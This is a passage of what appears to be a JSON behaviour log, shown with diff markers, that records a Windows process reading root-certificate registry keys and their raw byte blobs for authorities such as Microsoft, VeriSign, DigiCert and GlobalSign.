"\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x9ds\\x93y;\\xca2@1u\\xdc\\x12~\\x0e\\xc1\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00s\\xa5\\xe6J;\\xff\\x83\\x16\\xff\\x0e\\xdc\\xcca\\x8a\\x90nN\\xaeMti\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x01\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00r\\xa4\\x91\\x950\\x9f\\xb94\\xd6\n\\x98\\xe4\\xecE\\x1al\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\t\\xcbY\\x7f\\x86\\xb2p\\x8f\\x1a\\xc39\\xe3\\xc0\\xd9\\xe9\\xbf\\xbbM\\xb2#\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x000\\x14\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xc7A\\xf7\\x0fK*\\x8d\\x88\\xbf.q\\xc1A\"\\xefS\\xef\\x10\\xeb\\xa0\\xcf\\xa5\\xe6L\\xfa \\xf4\\x18\\x850s\\xe0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00S\\x00A\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x007\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00A3\\xc4\\xe6\\x0f\\xa1\\x83\\xee^zD\\x16\\xc5\\xd5L3\\x92\\xc5l/W()\\xbfY4tg\\xba\\xb0{\\xcd\\xcf\\x84\\x01b\\x98\\x83A\\xd2\\xd2\\x84\\xfb\\xd8V\\xdfS\\xb1 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\x05\\x00\\x000\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsof" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 290, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 291, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob", + "content": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd7\\xc6;\\xe0\\x83}\\xba\\xbf\\x88\\x1dO\\xbf_\\x98j\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\xfcc]\\xf6&>\r\\xf3%\\xbe_y\\xcdgg\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00F\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00u\\x00b\\x00l\\x00i\\x00c\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00t,1\\x92\\xe6\\x07\\xe4$\\xebEIT+\\xe1\\xbb\\xc5>at\\xe2\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x02\\x00\\x000\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r280801235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 292, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 293, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xb0\t\\xe9\\x9a\\\\xfc\\x92\\x8a\\x171\\x90\\x10m\\xbb2\\xa9\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00~\\x04\\xde\\x89j>fm\\x00\\xe6\\x87\\xd3?\\xfa\\xd9;\\xe8=4\\x9e\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\xab9\\xed\\xd1\\xa4\\xd8\\x9aU\\x12\\x88-\\xeb\t\\xcb\\x13\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb3\\xdbH\\xa4\\xf9\\xa1\\xc5\\xd8\\xae6A\\xcc\\x11cib)\\xbcK\\xc6b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x001\\xadfH\\xf8\\x10A8\\xc78\\xf3\\x9e\\xa42\\x0139>:\\x18\\xcc\\x02)n\\xf9|*\\xc9\\xefg1\\xd0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x003\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x82\\xc8\\x01\\x999w\"\\xb5z\\xd4s\\xea&k\\x93\\xd4\\x7f\\xfcw\\xfe\\x07\\xf0\\x93\\x884_ \\xda\\xb6\\xad\\xdd\\x08vr\\xf9\\x88\\xb4\\xbb\\xfd\\x15LK\\x130\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb3\\x03\\x00\\x000\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x00" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 296, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 297, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Zm\\x07\\xb67\\x1d\\x96j/\\xb6\\xba\\x92\\x82\\x8c\\xe5Q" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 298, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 299, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x14\\xc3\\xbd5I\\xee\"Z\\xec\\xe174\\xad\\x8c\\xa0\\xb8\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdf<$\\xf9\\xbf\\xd6fv\\x1b&\\x80s\\xfe\\x06\\xd1\\xcc\\x8dO\\x82\\xa4~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x80\\xc8+h\\x86\\xd7\\x01\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\xc3\\x0b\\xc9tiU`\\xa2\\xf0\t\neEUl\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00N\"T \\x18\\x95\\xe6\\xe3n\\xe6\\x0f\\xfa\\xfa\\xb9\\x12\\xed\\x06\\x17\\x8f9b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xcb<\\xcb\\xb7`1\\xe5\\xe0\\x13\\x8f\\x8d\\xd3\\x9a#\\xf9\\xdeG\\xff\\xc3^C\\xc1\\x14L\\xea'\\xd4jZ\\xb1\\xcb_\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x002\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00KN\\xb4\\xb0t)\\x8b\\x82\\x8b\\\\x000\\x95\\xa1\\x0bE#\\xfb\\x95\\x1c\\x0c\\x884\\x8b\t\\xc5>[\\xab\\xa4\\x08\\xa3\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe4\\xa6\\x8a\\xc8T\\xacRBF\n\\xfdrH\\x1b*D \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x92\\x03\\x00\\x000\\x82\\x03\\x8e" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 300, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 301, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates", + "content": "\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xd0U\\xcb\\xf4\\x0e~\\xdb\\x01\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 302, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 303, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00|\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xfc\\x02\\xa4\\x9e.\\x1e\\x8eH\\x8c\\xa2\\x91!5W,\\xc2\\xf8\\xe7\\x1b\\xb0\\xe2\\xf2\\x85\\x96\\xb3r\"\\x99\\xf5\\xcb\\x9cb\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x84's\\x95\\x00\\x86\\xd0k\\x04\\xd7\\x02-b\\xa2\\x84\\xbek\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00e\\xaf\\x95\\xf4\\xbe\\x86\\x84sDcB\\x82\\xf9A\\xb2\\xe6\\x05\\x06>\\xf0\\xc8T/\\x01L\\xa0\\x88\\xd1\\x82\\x10\\x9eO\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00j\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x004\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x19\\xe8\\x1b\\xe9\\xa1L\\xd8\\xe2/@\\xac\\x11\\x8ch~\\xcb\\xa3\\xf4\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x004\\xf7&\\x98\\xd7\\x0e#\\x1f\\x8d\\xc4[W\\xf1\\x18\\xa4K\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xe4\\xa2\\xf6\\xfe\\x9c\\xa7\\xf1\\x8a+\\xeb\\xa9aa0\\x8b\\xaa\\x88\\x80\\xb0\\x13\\x16\\x1d\\xdd\\x852\\xd4%\\x9e'\\xe5\\x05p\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcb\\xd1\\xf2\\xceH\\xfd\\x01\\x9f\\xeaV\\xaaW\\xd1~\\x99X\\xf8?\\xff\\xe0Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x06\\x00\\x000\\x82\\x06\\x030\\x82\\x03\\xeb\\xa0\\x03\\x02\\x01\\x02\\x02\\x10/\\xd6zC\"\\x932\\x90E\\xe9S4>\\xe2tf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000\\x81\\x931\\x0b0\t\\x06" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 304, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 305, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\06F1AA330B927B753A40E68CDF22E34BCBEF3352\\Blob", + "content": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\x9e}\\x1e\\x8d]\\xa1\\x1d\\xc0\\xc8K\\x07W\\xec\\xed\\xcb\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x002\\x99\\x19\\x81\\xbf\\x15u\\xa1\\xa50;\\xb9:8\\x17#\\xea4k\\x9e\\xc10\\xfd\\xb5\\x96\\xa7[\\xa1\\xd7\\xce\\x0b\n\\x06W\\x0b\\xb9\\x85\\xd2XA\\xe2;\\xe9D\\xe8\\xff\\x11\\x8f\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00l\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00E\\x00C\\x00C\\x00 \\x00P\\x00r\\x00o\\x00d\\x00u\\x00c\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x008\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x06\\xf1\\xaa3\\x0b\\x92{u:@\\xe6\\x8c\\xdf\"\\xe3K\\xcb\\xef3R\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x1f\\x12N\\xde\\x13\\xe0j\\x02<\\xd7\\xc0\\x9aOH\\xc3\\xd6\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00C\\xefp\\x87\\xb8\\x9d\\xbf\\xec\\x88\\x19\\xdc\\xc6\\xc4ku\ru43\\x08\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00'\\x03\\x00\\x000\\x82\\x03#0\\x82\\x02\\xa8\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x14\\x98&f\\xdc|\\xcd\\x8f@Sg{\\xb9\\x99\\xec\\x850\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030\\x81\\x941\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft C" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 306, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,687", + "eid": 307, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe5=4\\xce\\xcb\\x05\\xc1~\\xe32\\xc7I\\xd7\\x8c\\x02V\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00e\\xfcGR\\x0ff89b\\xec\\x0b{\\x88\\xa0\\x82\\x1d\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00>\\xdf)\\x0c\\xc1\\xf5\\xccs,\\xeb=$\\xe1~R\\xda\\xbd'\\xe2\\xf0 